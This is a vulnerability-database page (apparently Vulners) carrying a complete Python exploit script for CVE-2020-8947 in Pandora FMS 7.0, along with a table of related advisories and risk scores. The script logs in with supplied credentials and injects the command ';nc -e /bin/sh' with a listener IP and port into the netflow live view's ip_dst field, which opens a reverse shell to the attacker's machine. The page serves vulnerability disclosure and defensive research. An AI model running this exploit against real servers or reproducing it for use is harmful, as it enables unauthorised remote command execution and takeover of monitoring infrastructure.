Vulners
Lucene search
PANDORAFMS 7.0 - Authenticated Remote Code Execution
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | PANDORAFMS 7.0 - Authenticated Remote Code Execution Exploit | 13 Feb 202000:00 | – | zdt |
 | Artica Pandora FMS Remote Code Execution Vulnerability | 17 Feb 202000:00 | – | cnvd |
 | CVE-2020-8947 | 12 Feb 202017:52 | – | cve |
 | CVE-2020-8947 | 12 Feb 202017:52 | – | cvelist |
 | PANDORAFMS 7.0 - Authenticated Remote Code Execution | 13 Feb 202000:00 | – | exploitpack |
 | CVE-2020-8947 | 12 Feb 202018:15 | – | nvd |
 | Pandora FMS 7.0 Authenticated Remote Code Execution | 13 Feb 202000:00 | – | packetstorm |
 | Design/Logic Flaw | 12 Feb 202018:15 | – | prion |
 | CVE-2020-8947 | 22 May 202517:11 | – | redhatcve |
# Exploit Title: PANDORAFMS 7.0 - Authenticated Remote Code Execution
# Date: 2020-02-12
# Exploit Author: Engin Demirbilek
# Vendor homepage: http://pandorafms.org/
# Version: 7.0
# Software link: https://pandorafms.org/features/free-download-monitoring-software/
# Tested on: CentOS
# CVE: CVE-2020-8947
#!/bin/python
'''
PANDORAFMS 7.0 Authenticated Remote Code Execution x4
This exploits can be edited to exploit 4x Authenticated RCE vulnerabilities exist on PANDORAFMS.
incase default vulnerable variable won't work, change the position of payload to one of the following ip_src, dst_port, src_port
Author: Engin Demirbilek
Github: github.com/EnginDemirbilek
CVE: CVE-2020-8947
'''
import requests
import sys
if len(sys.argv) < 6:
print "Usage: ./exploit.py http://url username password listenerIP listenerPort"
exit()
url = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
payload = '";nc -e /bin/sh ' + sys.argv[4] + ' ' + sys.argv[5] + ' ' + '#'
login = {
'nick':user,
'pass':password,
'login_button':'Login'
}
req = requests.Session()
print "Sendin login request ..."
login = req.post(url+"/pandora_console/index.php?login=1", data=login)
payload = {
'date':"",
'time':"",
'period':"",
'interval_length':"",
'chart_type':"",
'max_aggregates':"1",
'address_resolution':"0",
'name':"",
'assign_group':"0",
'filter_type':"0",
'filter_id':"0",
'filter_selected':"0",
'ip_dst':payload,
'ip_src':"",
'dst_port':"",
'src_port':"",
'advanced_filter':"",
'aggregate':"dstip",
'router_ip':"",
'output':"bytes",
'draw_button':"Draw"
}
print "[+] Sendin exploit ..."
exploit = req.post(url+"/pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0",cookies=req.cookies, data=payload, headers={
'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Encoding':'gzip, deflate',
'Content-Type':'application/x-www-form-urlencoded'})
if exploit.status_code == 200:
print "[+] Everything seems ok, check your listener. If no connection established, change position of payload to ip_src, dst_port or src_port."
else:
print "[-] Couldn't send the HTTP request, try again."Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Feb 2020 00:00Current
7High risk
Vulners AI Score7
CVSS 3.17.2
CVSS 29
EPSS0.16795